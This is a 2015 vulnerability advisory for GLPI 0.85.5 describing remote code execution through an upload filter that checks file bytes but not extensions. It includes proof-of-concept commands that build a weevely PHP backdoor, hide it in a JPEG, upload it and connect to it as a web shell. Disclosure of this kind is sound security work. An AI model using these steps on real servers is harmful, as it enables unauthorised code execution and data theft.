92 lines
No EOL
3.4 KiB
Text
92 lines
No EOL
3.4 KiB
Text
# Exploit Title: GLPI 0.85.5 RCE through file upload filter bypass
|
|
# Date: September 7th, 2015
|
|
# Exploit Author: Raffaele Forte <raffaele@backbox.org>
|
|
# Vendor Homepage: http://www.glpi-project.org/
|
|
# Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz
|
|
# Version: GLPI 0.85.5
|
|
# Tested on: CentOS release 6.7 (Final), PHP 5.3.3
|
|
|
|
|
|
I. INTRODUCTION
|
|
========================================================================
|
|
|
|
GLPI is the Information Resource-Manager with an additional
|
|
Administration-Interface. You can use it to build up a database with an
|
|
inventory for your company (computer, software, printers...). It has
|
|
enhanced functions to make the daily life for the administrators easier,
|
|
like a job-tracking-system with mail-notification and methods to build a
|
|
database with basic information about your network-topology.
|
|
|
|
|
|
II. DESCRIPTION
|
|
========================================================================
|
|
|
|
|
|
The application allows users to upgrade their own profile. The user has
|
|
the possibility to add a new photo as attachment.
|
|
|
|
The photo that he uploads will be stored into "GLPI_ROOT/files/_pictures/".
|
|
|
|
This file, for example named "photo.jpeg", will be directly accessible
|
|
through "http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg", where "XXXX"
|
|
is an ID automatically generated by the system and visible in the HTML
|
|
source code.
|
|
|
|
Besides, the server does not check the extension of the uploaded file,
|
|
but only the first bytes within it, that indicates which kind of file is.
|
|
|
|
Exploiting this flaw, an attacker may upload a tampered jpeg file that
|
|
contains php code placed at the end of the file, so that, just changing
|
|
the file extention to ".php", by default the php code will be interpreted!
|
|
|
|
To trigger this vulnerability it is necessary to have an account.
|
|
|
|
This vulnerability is a combination of two issues:
|
|
- predictable uploaded file names and path
|
|
- upload of any kind of file, not limited to images
|
|
|
|
|
|
III. PROOF OF CONCEPT
|
|
========================================================================
|
|
|
|
Generate backdoor:
|
|
|
|
user@backbox:~$ weevely generate pass123 /tmp/bd.php
|
|
user@backbox:~$ file /tmp/photo.jpeg
|
|
/tmp/photo.jpeg: JPEG image data, JFIF standard 1.02
|
|
user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg
|
|
user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php
|
|
|
|
Upload the new tampered photo in GLPI > Settings
|
|
|
|
Run terminal to the target:
|
|
|
|
user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123
|
|
|
|
|
|
IV. BUSINESS IMPACT
|
|
========================================================================
|
|
By uploading a interpretable php file, an attacker may be able to
|
|
execute arbitrary code on the server.
|
|
|
|
This flaw may compromise the integrity of the system and/or expose
|
|
sensitive information.
|
|
|
|
|
|
V. SYSTEMS AFFECTED
|
|
========================================================================
|
|
GLPI Version 0.85.5 is vulnerable (probably all previous versions)
|
|
|
|
|
|
VI. VULNERABILITY HISTORY
|
|
========================================================================
|
|
September 7th, 2015: Vulnerability identification
|
|
September 25th, 2015: Vendor notification
|
|
|
|
|
|
VII. LEGAL NOTICES
|
|
========================================================================
|
|
The information contained within this advisory is supplied "as-is" with
|
|
no warranties or guarantees of fitness of use or otherwise. We accept no
|
|
responsibility for any damage caused by the use or misuseof this
|
|
information. |